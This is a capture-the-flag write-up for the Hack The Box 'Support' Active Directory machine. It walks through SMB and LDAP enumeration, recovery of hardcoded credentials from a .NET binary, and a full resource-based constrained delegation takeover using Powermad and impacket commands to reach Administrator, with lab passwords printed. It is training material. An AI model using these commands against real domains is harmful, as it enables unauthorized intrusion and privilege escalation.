Support Hackthebox Writeup

## Enumeration ``` # Nmap 7.92 scan initiated Sat Jul 30 15:05:35 2022 as: nmap -A -oN nmap-scan -Pn 10.129.25.194 Nmap scan report for 10.129.25.194 Host is up (0.21s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-30 19:05:55Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -17s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-07-30T19:06:24 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 30 15:07:35 2022 -- 1 IP address (1 host up) scanned in 119.98 seconds ``` Starting up with SMB , let's see what we have: ``` └─$ smbclient -L //support.htb/ -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to support.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ``` └─$ smbclient //support.htb/support-tools -N Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jul 20 13:01:06 2022 .. D 0 Sat May 28 07:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022 putty.exe A 1273576 Sat May 28 07:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022 4026367 blocks of size 4096. 871836 blocks available smb: \> ``` ## .NET SourceCode Reviewing I download the file `UserInfo.exe.zip` I unzip the file and I found a .NET windows executable , I open it up on DNSpy, I find a key and an encrypted text which should be the password : ![](https://i.imgur.com/15CVIGS.png) I copied the whole code and pasted it in Visual Studio , and then I changed the `return` call to : ```csharp= Console.WriteLine(Encoding.Default.GetString(array2)); ``` Executing the C# program will now provide us with the password: ![](https://i.imgur.com/wBbdWq4.png) Now to figure out where the password is being used: ![](https://i.imgur.com/lNOL65c.png) ## LDAP Enumeration It's being used to login to LDAP with the username `ldap` and the password `nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz` , Using a tool known as `ldapdomaindump` I am able to dump all user information , and computer information as well as group information: ```bash= ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --no-html --no-grep support.htb -o output/ ``` Visiting `output/` I am able to find the following files: ```bash └─$ ls -la total 160 drwxr-xr-x 2 kali kali 4096 Jul 30 17:32 . drwxr-xr-x 5 kali kali 4096 Jul 31 07:31 .. -rw-r--r-- 1 kali kali 6886 Jul 30 17:31 domain_computers.json -rw-r--r-- 1 kali kali 79816 Jul 30 17:31 domain_groups.json -rw-r--r-- 1 kali kali 5652 Jul 30 17:31 domain_policy.json -rw-r--r-- 1 kali kali 2 Jul 30 17:31 domain_trusts.json -rw-r--r-- 1 kali kali 50183 Jul 30 17:31 domain_users.json ``` Or instead an alternative , A tool known as JXplorer: ![](https://imgur.com/6LrG4PR.png) Checking on the information of the user `support` , I get the following: ![](https://imgur.com/VT12qZN.png) On `Info` key the value is `Ironside47pleasure40Watchful`, which I doubt must be the password , we can also get such information from the dumped json files by reading them and grepping `cn=support` ```bash= cat domain_users.json | grep -i "cn=support" -C 5 ``` ![](https://imgur.com/jDbWSNG.png) ## Initial Foothold With the password I suppose we got from `info` key , I try to login with `evil-winrm` as the user `support`, luckily , I got access: ![](https://imgur.com/yIEHdsQ.png) The flag is in `C:\Users\support\Desktop\user.txt` ## Privilege Escalation Now to check for support's privileges: ![](https://imgur.com/pfXNi5L.png) Seeing what groups the user support is in: ![](https://imgur.com/NOd8UzP.png) The user support has privileges to add a workstation to the domain, I did a little bit of article readings , and I ended up at my favourite all on one cheatsheets [ired.team](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution) For this to fully work , we first need to import a module known as Powermad, which can be found [here](https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1) After downloading `Powermad.ps1` I uploaded it to the directory I created in `C:\Temp\` and then I imported it with the command: ```bash= Import-Module .\Powermad.ps1 New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` The commands above will create a new Computer Object, Now to get the SID of the new Computer Object: ```bash= Get-DomainComputer fake01 ``` ![](https://imgur.com/2K3VvED.png) The SID is `S-1-5-21-1677581083-3380853377-188903654-5101` Now we create a new raw security descriptor: ```bash= $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) ``` Now we apply the security descriptor bytes to `dc`: ```bash= Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' ``` ![](https://imgur.com/s6LTMQT.png) With the new Computer Object created, I shall use it to create a ticket for user `administrator` and use it to login :) , let's give it a run: ```bash= impacket-getST support.htb/fake01:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb ``` ![](https://imgur.com/NDucMmF.png) ```bash= export KRB5CCNAME=administrator.ccache impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k ``` ![](https://imgur.com/TkWLmEv.png) And now we have `Administrator` Access! ## Briefing The machine is overall amazingly well made! A full AD machine with a bit of code reviewing , debugging not to forget Computer Object TakeOver with Kerberos. --- ![](https://i.imgur.com/kOD5xfq.gif)